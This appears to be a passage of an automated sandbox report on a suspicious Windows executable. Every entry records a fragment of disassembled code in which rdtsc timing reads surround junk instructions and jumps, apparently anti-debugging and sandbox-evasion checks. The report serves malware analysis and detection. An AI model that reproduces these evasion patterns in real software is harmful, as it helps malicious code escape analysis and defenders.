Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12231D9 second address: 12231DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12231DE second address: 12231E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12237CA second address: 12237CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12237CE second address: 12237D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12237D2 second address: 12237DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12237DC second address: 12237E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1223941 second address: 1223949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12239A8 second address: 1223A03 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C1CD2040Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d pushad 0x0000000e jmp 00007F8C1CD20407h 0x00000013 sub eax, dword ptr [ebp+129C1C23h] 0x00000019 popad 0x0000001a clc 0x0000001b lea eax, dword ptr [ebp+12B7452Eh] 0x00000021 adc dl, FFFFFF84h 0x00000024 mov ch, DCh 0x00000026 nop 0x00000027 pushad 0x00000028 je 00007F8C1CD203F8h 0x0000002e push eax 0x0000002f pop eax 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12583FF second address: 1258403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1258403 second address: 1258409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1258409 second address: 1258417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F8C1CD6323Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1258417 second address: 125841B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 125841B second address: 1258421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12642E5 second address: 12642E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12642E9 second address: 126431C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD6323Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F8C1CD6323Ch 0x0000000e jmp 00007F8C1CD6323Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 je 00007F8C1CD63236h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1263EA8 second address: 1263EAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1263EAE second address: 1263EB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1263EB5 second address: 1263EBA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1263FE1 second address: 1264012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jnl 00007F8C1CD6325Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1267FD5 second address: 1267FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1268278 second address: 1268282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 126839E second address: 12683B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F8C1CD203F6h 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12683B2 second address: 12683C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C1CD6323Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 126D351 second address: 126D355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1272D79 second address: 1272D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1272D7D second address: 1272D87 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C1CD203F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1272D87 second address: 1272D9A instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C1CD6323Ch 0x00000008 jnp 00007F8C1CD63236h 0x0000000e push eax 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12739C7 second address: 12739CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12764A8 second address: 12764AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12764AE second address: 12764D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FCh 0x00000007 jns 00007F8C1CD203F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F8C1CD203FCh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12764D0 second address: 12764DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8C1CD63236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12764DA second address: 12764E5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1276793 second address: 1276797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1276797 second address: 12767D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD203FFh 0x00000007 jmp 00007F8C1CD20405h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 jmp 00007F8C1CD203FDh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12767D7 second address: 12767DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12767DF second address: 12767E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1276AC2 second address: 1276AD5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C1CD63236h 0x00000008 ja 00007F8C1CD63236h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127EE38 second address: 127EE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127EE3D second address: 127EE6C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8C1CD6323Eh 0x00000008 jl 00007F8C1CD63236h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push esi 0x00000011 jmp 00007F8C1CD63242h 0x00000016 pop esi 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a jbe 00007F8C1CD6323Eh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127D416 second address: 127D44C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F8C1CD2041Dh 0x0000000c jmp 00007F8C1CD20401h 0x00000011 jmp 00007F8C1CD20406h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127D6E2 second address: 127D6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127D6E8 second address: 127D708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F8C1CD20408h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127D708 second address: 127D734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jbe 00007F8C1CD63236h 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 je 00007F8C1CD63236h 0x00000019 jmp 00007F8C1CD63242h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127D734 second address: 127D755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD20407h 0x00000007 jl 00007F8C1CD203FEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127DD46 second address: 127DD4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127DD4C second address: 127DD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jp 00007F8C1CD203F6h 0x0000000c jp 00007F8C1CD203F6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127DD5F second address: 127DD69 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8C1CD63242h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127E2C9 second address: 127E2F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C1CD20407h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127E2F0 second address: 127E30D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C1CD63249h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127E30D second address: 127E313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127E87F second address: 127E885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 127EB66 second address: 127EB6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 11D1CB2 second address: 11D1CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F8C1CD63249h 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F8C1CD63236h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 128A463 second address: 128A467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 128A467 second address: 128A483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jbe 00007F8C1CD63236h 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007F8C1CD63236h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 128A483 second address: 128A490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F8C1CD203F8h 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12895D9 second address: 12895DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1289AAA second address: 1289ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 je 00007F8C1CD2040Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1289ABA second address: 1289ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1289E8E second address: 1289EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F8C1CD20406h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jo 00007F8C1CD203FEh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 128A176 second address: 128A17C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 128A17C second address: 128A182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 129020F second address: 129021B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8C1CD63236h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 129021B second address: 129022B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F8C1CD203F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 129047D second address: 1290481 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1290481 second address: 1290497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8C1CD203FCh 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 129074E second address: 129075A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8C1CD63236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 129075A second address: 1290768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12909E1 second address: 1290A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007F8C1CD63248h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12914AE second address: 12914B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12914B4 second address: 12914B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1291B86 second address: 1291B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1291B8B second address: 1291B93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1298DA8 second address: 1298DAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1298DAC second address: 1298DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1298DB2 second address: 1298DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1298DBE second address: 1298DE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C1CD63247h 0x00000009 jp 00007F8C1CD63236h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1298DE0 second address: 1298E03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F8C1CD203F6h 0x00000009 jns 00007F8C1CD203F6h 0x0000000f jmp 00007F8C1CD20402h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1298F38 second address: 1298F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12A9E85 second address: 12A9E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12A9E89 second address: 12A9E8E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12BB3F7 second address: 12BB3FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12BB3FB second address: 12BB410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8C1CD6323Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12C234F second address: 12C2355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12C2355 second address: 12C2359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 12C7EF1 second address: 12C7F1E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8C1CD203F6h 0x00000008 jmp 00007F8C1CD20407h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jg 00007F8C1CD203F8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1301A28 second address: 1301A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F8C1CD63236h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1301A34 second address: 1301A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1306217 second address: 130621B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1306051 second address: 130609C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pushad 0x00000008 jmp 00007F8C1CD20407h 0x0000000d jmp 00007F8C1CD20406h 0x00000012 jmp 00007F8C1CD20404h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 130D36A second address: 130D3B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F8C1CD63247h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8C1CD63244h 0x00000016 jmp 00007F8C1CD6323Fh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 130D3B0 second address: 130D3B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 130F943 second address: 130F947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13111BD second address: 13111CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F8C1CD203F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 13111CD second address: 13111D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\mBr65h6L4w.exe RDTSC instruction interceptor: First address: 1311018 second address: 1311024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8C1CD203F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
